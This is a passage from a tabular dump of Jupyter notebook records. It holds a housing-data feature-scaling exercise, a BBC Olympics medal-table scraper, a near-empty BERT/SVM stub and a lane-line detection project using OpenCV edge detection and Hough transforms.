"_____no_output_____"
],
[
"# get list of categories\n\nhousing_cat_1hot.toarray()",
"_____no_output_____"
]
],
[
[
"# Feature Scaling\nOne of the most important transformations you need to apply to your data is feature\nscaling. With few exceptions, Machine Learning algorithms don’t perform well when\nthe input numerical attributes have very different scales. This is the case for the hous‐\ning data: the total number of rooms ranges from about 6 to 39,320, while the median\nincomes only range from 0 to 15. Note that scaling the target values is generally not\nrequired.\nThere are two common ways to get all attributes to have the same scale: min-max\nscaling and standardization.\nMin-max scaling (many people call this normalization) is quite simple: values are\nshifted and rescaled so that they end up ranging from 0 to 1.# ",
"_____no_output_____"
]
],
[
[
"housing_cat",
"_____no_output_____"
],
[
"housing",
"_____no_output_____"
],
[
"housing.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 16512 entries, 17606 to 15775\nData columns (total 9 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 16512 non-null float64\n 1 latitude 16512 non-null float64\n 2 housing_median_age 16512 non-null float64\n 3 total_rooms 16512 non-null float64\n 4 total_bedrooms 16512 non-null float64\n 5 population 16512 non-null float64\n 6 households 16512 non-null float64\n 7 median_income 16512 non-null float64\n 8 ocean_proximity 16512 non-null object \ndtypes: float64(8), object(1)\nmemory usage: 1.3+ MB\n"
],
[
"housing.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 16512 entries, 17606 to 15775\nData columns (total 9 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 16512 non-null float64\n 1 latitude 16512 non-null float64\n 2 housing_median_age 16512 non-null float64\n 3 total_rooms 16512 non-null float64\n 4 total_bedrooms 16512 non-null float64\n 5 population 16512 non-null float64\n 6 households 16512 non-null float64\n 7 median_income 16512 non-null float64\n 8 ocean_proximity 16512 non-null object \ndtypes: float64(8), object(1)\nmemory usage: 1.3+ MB\n"
],
[
"housing[\"total_rooms\"].value_counts().head(100)",
"_____no_output_____"
],
[
"housing[\"median_income\"].value_counts().head(100)",
"_____no_output_____"
]
],
[
[
"## feature scaling\n\n### types\n- Min-Max /Normalization\n- Standarzation \n\n- Min-Max\nMin-Max scaler: In this we subtract the Minimum from all values – thereby marking a scale from Min to Max. Then divide it by the difference between Min and Max. The result is that our values will go from zero to 1.\n\n- Standardization is quite different: first it subtracts the mean value (so standardized\nvalues always have a zero mean), and then it divides by the standard deviation so that\nthe resulting distribution has unit variance. Unlike min-max scaling, standardization\ndoes not bound values to a specific range, which may be a problem for some algo‐\nrithms (e.g., neural networks often expect an input value ranging from 0 to 1). How‐\never, standardization is much less affected by outliers. For example, suppose a district\nhad a median income equal to 100 (by mistake). Min-max scaling would then crush\nall the other values from 0–15 down to 0–0.15, whereas standardization would not be\nmuch affected. Scikit-Learn provides a transformer called StandardScaler for stand‐\nardization.\n\n\n#### scikit learn handling feature scaling\nScikit-Learn provides a\ntransformer called MinMaxScaler for this. It has a feature_range hyperparameter\nthat lets you change the range if you don’t want 0–1 for some reason.",
"_____no_output_____"
],
[
"# Transformation Pipelines\n",
"_____no_output_____"
]
],
[
[
"pip install scikit-learn==2.0",
"Note: you may need to restart the kernel to use updated packages.\n"
],
[
"from sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline",
"_____no_output_____"
],
[
"num_pipeline = Pipeline([\n ('imputer', SimpleImputer(strategy=\"median\")),\n ('attribs_adder' , CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n])",
"_____no_output_____"
],
[
"from sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\n\nnum_pipeline = Pipeline([('imputer', SimpleImputer(strategy=\"median\")),\n ('attribs_adder',CombinedAttributesAdder() ),\n ('std_scaler', StandardScaler()),\n ])",
"_____no_output_____"
],
[
"from sklearn.compose import ColumnTransformer\n\n\n\n",
"_____no_output_____"
],
[
"housing_num",
"_____no_output_____"
],
[
"num_attribs = list(housing_num)\ncat_attribs = [\"ocean_proximity\"]",
"_____no_output_____"
],
[
"full_pipeline = ColumnTransformer([\n (\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoder(), cat_attribs),\n])",
"_____no_output_____"
],
[
"housing_prepared = full_pipeline.fit_transform(housing)",
"_____no_output_____"
],
[
"pip install scikit-learn==2.0",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53cff7fa953f466ee5e8033d039bed92759fd7 | 7,192 | ipynb | Jupyter Notebook | olympics/.ipynb_checkpoints/2016 Olympics medal count acquisition-checkpoint.ipynb | srcole/qwm | 83eb7d6209f9ef45bd475166039afb15702b2eda | [
"MIT"
] | 13 | 2016-01-27T17:46:29.000Z | 2021-06-07T22:35:15.000Z | olympics/.ipynb_checkpoints/2016 Olympics medal count acquisition-checkpoint.ipynb | srcole/qwm | 83eb7d6209f9ef45bd475166039afb15702b2eda | [
"MIT"
] | null | null | null | olympics/.ipynb_checkpoints/2016 Olympics medal count acquisition-checkpoint.ipynb | srcole/qwm | 83eb7d6209f9ef45bd475166039afb15702b2eda | [
"MIT"
] | 19 | 2016-07-03T18:04:06.000Z | 2021-04-20T06:21:50.000Z | 30.09205 | 410 | 0.506952 | [
[
[
"# 2016 Olympics medal count acquisition\n\nIn this notebook, we acquire the current medal count from the web.",
"_____no_output_____"
],
[
"# 1. List of sports",
"_____no_output_____"
]
],
[
[
"from bs4 import BeautifulSoup\nimport urllib\nr = urllib.urlopen('http://www.bbc.com/sport/olympics/rio-2016/medals/sports').read()\nsoup = BeautifulSoup(r,\"lxml\")\n\nsports_span = soup.findAll(\"span\",{\"class\",\"medals-table-by-sport__sport-name\"})\nsports_names = []\nsports_names_format = []\nfor s in sports_span:\n sports_names_format.append(str(s))\n sports_names.append(str(s).lower().replace(\" \",\"-\")[48:-7])\nprint sports_names",
"['archery', 'athletics', 'badminton', 'basketball', 'boxing', 'canoeing', 'cycling', 'diving', 'equestrian', 'fencing', 'football', 'golf', 'gymnastics', 'handball', 'hockey', 'judo', 'modern-pentathlon', 'rowing', 'rugby-sevens', 'sailing', 'shooting', 'swimming', 'synchronised-swimming', 'table-tennis', 'taekwondo', 'tennis', 'triathlon', 'volleyball', 'water-polo', 'weightlifting', 'wrestling']\n"
]
],
[
[
"# 2. HTMLs for each sport's medal table",
"_____no_output_____"
]
],
[
[
"# Save html for each sport\nhtmls = {}\nfor s in sports_names:\n htmls[s] = urllib.urlopen('http://www.bbc.com/sport/olympics/rio-2016/medals/sports/'+s+'#'+s).read()",
"_____no_output_____"
],
[
"# Find table html for each sport\nthtmls = {}\nfor s in sports_names:\n soupsp = BeautifulSoup(htmls[s],\"lxml\")\n thtmls[s] = soupsp.findAll(\"table\",{\"class\",\"medals-table-by-sport__countries_table\"})",
"_____no_output_____"
]
],
[
[
"# 3. Scrape medals for each country and sport",
"_____no_output_____"
]
],
[
[
"# For every sport, scrape medal data\nimport re\nmedal_names = ['gold','silver','bronze']\nmedals = {}\nsports_countries = {}\nall_countries_format = []\nfor s in sports_names:\n print s\n medals[s] = {}\n h = str(thtmls[s])\n if not thtmls[s]:\n print 'no medals yet'\n else:\n # Find countries of interest\n pattern = r\"<abbr class=\\\"abbr-on medium-abbr-off\\\" title=\\\"\"\n pmatch = re.finditer(pattern, h)\n countries = []\n for i,match in enumerate(pmatch):\n country = h[int(match.end()):int(match.end())+200].rsplit('\"')[0]\n all_countries_format.append(country)\n countries.append(country.lower().replace(\" \",\"-\"))\n sports_countries[s] = countries\n for c in sports_countries[s]:\n if c == 'great-britain-&-n.-ireland':\n ci1 = 'great-britain-and-northern-ireland'\n medals[s][c] = {}\n for m in medal_names:\n pattern = r\"<abbr class=\\\"abbr-on medium-abbr-off\\\" title=\\\".{,800}\" + m + \".{,150}\" + ci1 + \"\\\">\"\n gendermatch = re.finditer(pattern, h)\n for i,match in enumerate(gendermatch):\n medals[s][c][m] = int(h[int(match.end()):int(match.end())+3])\n else:\n ci = c\n medals[s][ci] = {}\n for m in medal_names:\n pattern = r\"<abbr class=\\\"abbr-on medium-abbr-off\\\" title=\\\".{,500}\" + m + \".{,150}\" + ci + \"\\\">\"\n gendermatch = re.finditer(pattern, h)\n for i,match in enumerate(gendermatch):\n medals[s][ci][m] = int(h[int(match.end()):int(match.end())+3])\n print medals[s]",
"_____no_output_____"
]
],
[
[
"# Create dataframe of medals",
"_____no_output_____"
]
],
[
[
"import numpy as np\nall_countries_format = list(np.unique(all_countries_format))\nall_countries_format.remove('Great Britain & N. Ireland')\nall_countries_format.append('Great Britain')\nall_countries_format_list = list(np.unique(all_countries_format))",
"_____no_output_____"
],
[
"import pandas as pd\n\n# Create an empty dataframe\ncolumns = ['country','sport','medal','N']\ndf = pd.DataFrame(columns=columns)\n\n# Identify all countries with at least 1 medal\ncountries_list = list(set(reduce(lambda x,y: x+y,sports_countries.values())))\ncountries_list = sorted(countries_list)\n# Fill dataframe\nfor s in sports_names:\n if thtmls[s]:\n for i,c in enumerate(countries_list):\n ci = all_countries_format_list[i]\n for m in medal_names:\n if c in sports_countries[s]:\n rowtemp = [ci, s, m, medals[s][c][m]]\n else:\n rowtemp = [ci, s, m, 0]\n dftemp = pd.DataFrame([rowtemp], columns=columns)\n df =df.append(dftemp)",
"_____no_output_____"
]
],
[
[
"# Save dataframe",
"_____no_output_____"
]
],
[
[
"df.to_csv('now_medals.csv')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb53d21619790f37e21a6331ed3bbd7c6d0fd8bc | 948 | ipynb | Jupyter Notebook | task_1/bert_svm.ipynb | icobx/claim_detection | f6ba48e4406d3308c869f1ef42ce6ca3c0f54141 | [
"MIT"
] | null | null | null | task_1/bert_svm.ipynb | icobx/claim_detection | f6ba48e4406d3308c869f1ef42ce6ca3c0f54141 | [
"MIT"
] | null | null | null | task_1/bert_svm.ipynb | icobx/claim_detection | f6ba48e4406d3308c869f1ef42ce6ca3c0f54141 | [
"MIT"
] | null | null | null | 16.928571 | 77 | 0.520042 | [
[
[
"print('hello')",
"hello\n"
],
[
"from",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code"
]
] |
cb53d78ec66f1f7cd4cce54f98983a8dbce940de | 610,206 | ipynb | Jupyter Notebook | lane_finding/lane_finding.ipynb | donghankim/Detecting-Car-Lanes | 7fd56148ad9eed4dabcedfdf6484c095797ab310 | [
"MIT"
] | null | null | null | lane_finding/lane_finding.ipynb | donghankim/Detecting-Car-Lanes | 7fd56148ad9eed4dabcedfdf6484c095797ab310 | [
"MIT"
] | null | null | null | lane_finding/lane_finding.ipynb | donghankim/Detecting-Car-Lanes | 7fd56148ad9eed4dabcedfdf6484c095797ab310 | [
"MIT"
] | null | null | null | 791.447471 | 230,124 | 0.949127 | [
[
[
"# Self-Driving Car Engineer Nanodegree\n\n\n## Project: **Finding Lane Lines on the Road** \n***\nIn this project, you will use the tools you learned about in the lesson to identify lane lines on the road. You can develop your pipeline on a series of individual images, and later apply the result to a video stream (really just a series of images). Check out the video clip \"raw-lines-example.mp4\" (also contained in this repository) to see what the output should look like after using the helper functions below. \n\nOnce you have a result that looks roughly like \"raw-lines-example.mp4\", you'll need to get creative and try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video \"P1_example.mp4\". Ultimately, you would like to draw just one line for the left side of the lane, and one for the right.\n\nIn addition to implementing code, there is a brief writeup to complete. The writeup should be completed in a separate file, which can be either a markdown file or a pdf document. There is a [write up template](https://github.com/udacity/CarND-LaneLines-P1/blob/master/writeup_template.md) that can be used to guide the writing process. Completing both the code in the Ipython notebook and the writeup template will cover all of the [rubric points](https://review.udacity.com/#!/rubrics/322/view) for this project.\n\n---\nLet's have a look at our first image called 'test_images/solidWhiteRight.jpg'. Run the 2 cells below (hit Shift-Enter or the \"play\" button above) to display the image.\n\n**Note: If, at any point, you encounter frozen display windows or other confounding issues, you can always start again with a clean slate by going to the \"Kernel\" menu above and selecting \"Restart & Clear Output\".**\n\n---",
"_____no_output_____"
],
[
"**The tools you have are color selection, region of interest selection, grayscaling, Gaussian smoothing, Canny Edge Detection and Hough Tranform line detection. You are also free to explore and try other techniques that were not presented in the lesson. Your goal is piece together a pipeline to detect the line segments in the image, then average/extrapolate them and draw them onto the image for display (as below). Once you have a working pipeline, try it out on the video stream below.**\n\n---\n\n<figure>\n <img src=\"examples/line-segments-example.jpg\" width=\"380\" alt=\"Combined Image\" />\n <figcaption>\n <p></p> \n <p style=\"text-align: center;\"> Your output should look something like this (above) after detecting line segments using the helper functions below </p> \n </figcaption>\n</figure>\n <p></p> \n<figure>\n <img src=\"examples/laneLines_thirdPass.jpg\" width=\"380\" alt=\"Combined Image\" />\n <figcaption>\n <p></p> \n <p style=\"text-align: center;\"> Your goal is to connect/average/extrapolate line segments to get output like this</p> \n </figcaption>\n</figure>",
"_____no_output_____"
],
[
"**Run the cell below to import some packages. If you get an `import error` for a package you've already installed, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.** ",
"_____no_output_____"
],
[
"## Import Packages",
"_____no_output_____"
]
],
[
[
"#importing some useful packages\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nimport math\nimport pdb, os\nfrom collections.abc import Mapping\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"## Read in an Image",
"_____no_output_____"
]
],
[
[
"#reading in an image\nimage = mpimg.imread('test_images/solidWhiteRight.jpg')\n\n#printing out some stats and plotting\nprint('This image is:', type(image), 'with dimensions:', image.shape)\nplt.imshow(image) # if you wanted to show a single color channel image called 'gray', for example, call as plt.imshow(gray, cmap='gray')",
"This image is: <class 'numpy.ndarray'> with dimensions: (540, 960, 3)\n"
]
],
[
[
"## Ideas for Lane Detection Pipeline",
"_____no_output_____"
],
[
"**Some OpenCV functions (beyond those introduced in the lesson) that might be useful for this project are:**\n\n`cv2.inRange()` for color selection \n`cv2.fillPoly()` for regions selection \n`cv2.line()` to draw lines on an image given endpoints \n`cv2.addWeighted()` to coadd / overlay two images\n`cv2.cvtColor()` to grayscale or change color\n`cv2.imwrite()` to output images to file \n`cv2.bitwise_and()` to apply a mask to an image\n\n**Check out the OpenCV documentation to learn about these and discover even more awesome functionality!**",
"_____no_output_____"
]
],
[
[
"# Helper Functions\n\ndef show_img(img_dict):\n if not isinstance(img_dict, Mapping):\n plt.imshow(img_dict)\n return\n elif len(img_dict) == 1:\n plt.imshow(img_dict.values[0]) \n return\n else:\n col = 3\n row = 1\n values_list = list(img_dict.values())\n \n fig, axes = plt.subplots(row, col, figsize = (16, 8))\n fig.subplots_adjust(hspace = 0.1, wspace = 0.2)\n axes.ravel()\n \n axes[0].imshow(values_list[0])\n axes[1].imshow(values_list[1])\n axes[2].imshow(values_list[2])\n \n\ndef grayscale(img):\n return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \ndef canny(img, low_threshold, high_threshold):\n return cv2.Canny(img, low_threshold, high_threshold)\n\ndef gaussian_blur(img, kernel_size):\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\ndef region_of_interest(img, vertices):\n \"\"\"\n Only keeps the region of the image defined by the polygon\n formed from `vertices`. The rest of the image is set to black.\n `vertices` should be a numpy array of integer points.\n \"\"\"\n #defining a blank mask to start with\n mask = np.zeros_like(img) \n \n #defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n \n #filling pixels inside the polygon defined by \"vertices\" with the fill color \n cv2.fillPoly(mask, vertices, ignore_mask_color)\n \n #returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n \ndef hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap, default):\n \"\"\"\n `img` should be the output of a Canny transform.\n \n Returns an image with hough lines drawn.\n \"\"\"\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n if default:\n draw_default_lines(line_img, lines)\n else:\n draw_lines(line_img, lines)\n return line_img\n\n# Python 3 has support for cool math symbols.\ndef weighted_img(img, initial_img, α=0.8, β=1., γ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n \n `initial_img` should be the image before any processing.\n \n The result image is computed as follows:\n \n initial_img * α + img * β + γ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, γ)\n\n\ndef draw_default_lines(img, lines, color=[255, 0, 0], thickness=5):\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(img, (x1, y1), (x2, y2), color, thickness)\n \n\ndef draw_lines(img, lines, color=[255, 0, 0], thickness=10):\n \"\"\" \n This function draws `lines` with `color` and `thickness`. \n Lines are drawn on the image inplace (mutates the image).\n If you want to make the lines semi-transparent, think about combining\n this function with the weighted_img() function below\n \"\"\"\n # Track gradient and intercept of left and right lane\n left_slope = []\n left_intercept = []\n left_y = []\n \n right_slope = []\n right_intercept = []\n right_y = []\n \n \n for line in lines:\n for x1,y1,x2,y2 in line:\n slope = (y2-y1)/(x2-x1)\n intercept = y2 - (slope*x2)\n \n # right lane\n if slope > 0.0 and slope < math.inf and abs(slope) > 0.3:\n right_slope.append(slope)\n right_intercept.append(intercept)\n right_y.append(y1)\n right_y.append(y2)\n\n # left lane\n elif slope < 0.0 and slope > -math.inf and abs(slope) > 0.3:\n left_slope.append(slope)\n left_intercept.append(intercept)\n left_y.append(y1)\n left_y.append(y2)\n \n \n y_min = min(min(left_y), min(right_y)) + 40\n y_max = img.shape[0]\n l_m = np.mean(left_slope)\n l_c = np.mean(left_intercept)\n r_m = np.mean(right_slope)\n r_c = np.mean(right_intercept)\n \n l_x_max = int((y_max - l_c)/l_m)\n l_x_min = int((y_min - l_c)/l_m) \n r_x_max = int((y_max - r_c)/r_m)\n r_x_min = int((y_min - r_c)/r_m)\n\n #pdb.set_trace()\n cv2.line(img, (l_x_max, y_max),(l_x_min, y_min), color, thickness)\n cv2.line(img, (r_x_max, y_max),(r_x_min, y_min), color, thickness)",
"_____no_output_____"
]
],
[
[
"## Build a Lane Finding Pipeline\n\n",
"_____no_output_____"
],
[
"Build the pipeline and run your solution on all test_images. Make copies into the `test_images_output` directory, and you can use the images in your writeup report.\n\nTry tuning the various parameters, especially the low and high Canny thresholds as well as the Hough lines parameters.",
"_____no_output_____"
]
],
[
[
"# This cell creates a dictionary of all of the images in 'test_images' folder\ndef get_images(IMG_PATH = None):\n if IMG_PATH == None:\n test_imgs = os.listdir(\"test_images/\")\n IMG_PATH = \"test_images/\"\n else:\n test_imgs = os.listdir(IMG_PATH)\n \n # create an array that contains all test images\n img_dict = {}\n for image in test_imgs:\n img_dict[image] = mpimg.imread(os.path.join(IMG_PATH, image))\n \n return img_dict",
"_____no_output_____"
],
[
"# outputs lanes for all images in image dictionary\n\ndef interpolate(lanes, img):\n # Interpolating lines\n result = weighted_img(lanes, img)\n return result\n\ndef get_lanes(img_dict, default = False):\n if isinstance(img_dict, Mapping):\n for image in img_dict.keys():\n test_img = img_dict[image]\n # Converting to grayscale\n gray_img = grayscale(test_img)\n blur_img = gaussian_blur(gray_img, kernel_size = 3)\n\n # Computing Edges\n edges = canny(blur_img, low_threshold = 75, high_threshold = 150)\n\n # Extracting Region of Interest\n points = np.array([[130,600],[380,300],[650,300],[900,550]], dtype=np.int32)\n ROI = region_of_interest(edges, [points])\n\n # Performing Hough Transform and draw lanes\n lanes = hough_lines(ROI, 2, np.pi/180, 15, 5, 25, default)\n if default:\n img_dict[image] = lanes\n else:\n res = interpolate(lanes, test_img)\n img_dict[image] = res\n return img_dict\n \n # from video frames\n else:\n gray_img = grayscale(img_dict)\n blur_img = gaussian_blur(gray_img, kernel_size = 3)\n\n # Computing Edges\n edges = canny(blur_img, low_threshold = 75, high_threshold = 150)\n\n # Extracting Region of Interest\n points = np.array([[130,600],[380,300],[650,300],[900,550]], dtype=np.int32)\n ROI = region_of_interest(edges, [points])\n\n # Performing Hough Transform and draw lanes\n lanes = hough_lines(ROI, 2, np.pi/180, 15, 5, 25, default)\n res = interpolate(lanes, img_dict)\n return res",
"_____no_output_____"
],
[
"img_dict = get_images()\nshow_img(img_dict)",
"_____no_output_____"
],
[
"default_lanes = get_lanes(img_dict, True)\nshow_img(default_lanes)",
"_____no_output_____"
],
[
"img_dict = get_images()\nfinal_output = get_lanes(img_dict)\nshow_img(final_output)",
"_____no_output_____"
],
[
"# This block will automatically compute and save the lanes to the folder 'test_images_output'\n\ndef compute_test_images(img_dict):\n \n # compute the lanes for all test_images\n lanes_dict = get_lanes(img_dict)\n \n # save outputs to 'test_images_output'\n for image in lanes_dict.keys():\n PATH = 'test_images_output/'\n mpimg.imsave(os.path.join(PATH, image), img_dict[image])\n \ncompute_test_images(img_dict)",
"/opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:112: RuntimeWarning: divide by zero encountered in int_scalars\n"
]
],
[
[
"## Test on Videos\n\nYou know what's cooler than drawing lanes over images? Drawing lanes over video!\n\nWe can test our solution on two provided videos:\n\n`solidWhiteRight.mp4`\n\n`solidYellowLeft.mp4`\n\n**Note: if you get an import error when you run the next cell, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.**\n\n**If you get an error that looks like this:**\n```\nNeedDownloadError: Need ffmpeg exe. \nYou can download it by calling: \nimageio.plugins.ffmpeg.download()\n```\n**Follow the instructions in the error message and check out [this forum post](https://discussions.udacity.com/t/project-error-of-test-on-videos/274082) for more troubleshooting tips across operating systems.**",
"_____no_output_____"
]
],
[
[
"# Import everything needed to edit/save/watch video clips\nfrom moviepy.editor import VideoFileClip\nfrom IPython.display import HTML",
"_____no_output_____"
],
[
"def process_image(image):\n # NOTE: The output you return should be a color image (3 channel) for processing video below\n # TODO: put your pipeline here,\n # you should return the final output (image where lines are drawn on lanes)\n result = get_lanes(image)\n return result\n",
"_____no_output_____"
]
],
[
[
"Let's try the one with the solid white lane on the right first ...",
"_____no_output_____"
]
],
[
[
"white_output = 'test_videos_output/solidWhiteRight.mp4'\n## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video\n## To do so add .subclip(start_second,end_second) to the end of the line below\n## Where start_second and end_second are integer values representing the start and end of the subclip\n## You may also uncomment the following line for a subclip of the first 5 seconds\n##clip1 = VideoFileClip(\"test_videos/solidWhiteRight.mp4\").subclip(0,5)\nclip1 = VideoFileClip(\"test_videos/solidWhiteRight.mp4\")\nwhite_clip = clip1.fl_image(process_image) #NOTE: this function expects color images!!\n%time white_clip.write_videofile(white_output, audio=False)",
"[MoviePy] >>>> Building video test_videos_output/solidWhiteRight.mp4\n[MoviePy] Writing video test_videos_output/solidWhiteRight.mp4\n"
]
],
[
[
"Play the video inline, or if you prefer find the video in your filesystem (should be in the same directory) and play it in your video player of choice.",
"_____no_output_____"
]
],
[
[
"HTML(\"\"\"\n<video width=\"960\" height=\"540\" controls>\n <source src=\"{0}\">\n</video>\n\"\"\".format(white_output))",
"_____no_output_____"
]
],
[
[
"## Improve the draw_lines() function\n\n**At this point, if you were successful with making the pipeline and tuning parameters, you probably have the Hough line segments drawn onto the road, but what about identifying the full extent of the lane and marking it clearly as in the example video (P1_example.mp4)? Think about defining a line to run the full length of the visible lane based on the line segments you identified with the Hough Transform. As mentioned previously, try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video \"P1_example.mp4\".**\n\n**Go back and modify your draw_lines function accordingly and try re-running your pipeline. The new output should draw a single, solid line over the left lane line and a single, solid line over the right lane line. The lines should start from the bottom of the image and extend out to the top of the region of interest.**",
"_____no_output_____"
],
[
"Now for the one with the solid yellow lane on the left. This one's more tricky!",
"_____no_output_____"
]
],
[
[
"yellow_output = 'test_videos_output/solidYellowLeft.mp4'\n## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video\n## To do so add .subclip(start_second,end_second) to the end of the line below\n## Where start_second and end_second are integer values representing the start and end of the subclip\n## You may also uncomment the following line for a subclip of the first 5 seconds\n##clip2 = VideoFileClip('test_videos/solidYellowLeft.mp4').subclip(0,5)\nclip2 = VideoFileClip('test_videos/solidYellowLeft.mp4')\nyellow_clip = clip2.fl_image(process_image)\n%time yellow_clip.write_videofile(yellow_output, audio=False)",
"_____no_output_____"
],
[
"HTML(\"\"\"\n<video width=\"960\" height=\"540\" controls>\n <source src=\"{0}\">\n</video>\n\"\"\".format(yellow_output))",
"_____no_output_____"
]
],
[
[
"## Writeup and Submission\n\nIf you're satisfied with your video outputs, it's time to make the report writeup in a pdf or markdown file. Once you have this Ipython notebook ready along with the writeup, it's time to submit for review! Here is a [link](https://github.com/udacity/CarND-LaneLines-P1/blob/master/writeup_template.md) to the writeup template file.\n",
"_____no_output_____"
],
[
"## Optional Challenge\n\nTry your lane finding pipeline on the video below. Does it still work? Can you figure out a way to make it more robust? If you're up for the challenge, modify your pipeline so it works with this video and submit it along with the rest of your project!",
"_____no_output_____"
]
],
[
[
"challenge_output = 'test_videos_output/challenge.mp4'\n## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video\n## To do so add .subclip(start_second,end_second) to the end of the line below\n## Where start_second and end_second are integer values representing the start and end of the subclip\n## You may also uncomment the following line for a subclip of the first 5 seconds\n##clip3 = VideoFileClip('test_videos/challenge.mp4').subclip(0,5)\nclip3 = VideoFileClip('test_videos/challenge.mp4')\nchallenge_clip = clip3.fl_image(process_image)\n%time challenge_clip.write_videofile(challenge_output, audio=False)",
"_____no_output_____"
],
[
"HTML(\"\"\"\n<video width=\"960\" height=\"540\" controls>\n <source src=\"{0}\">\n</video>\n\"\"\".format(challenge_output))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.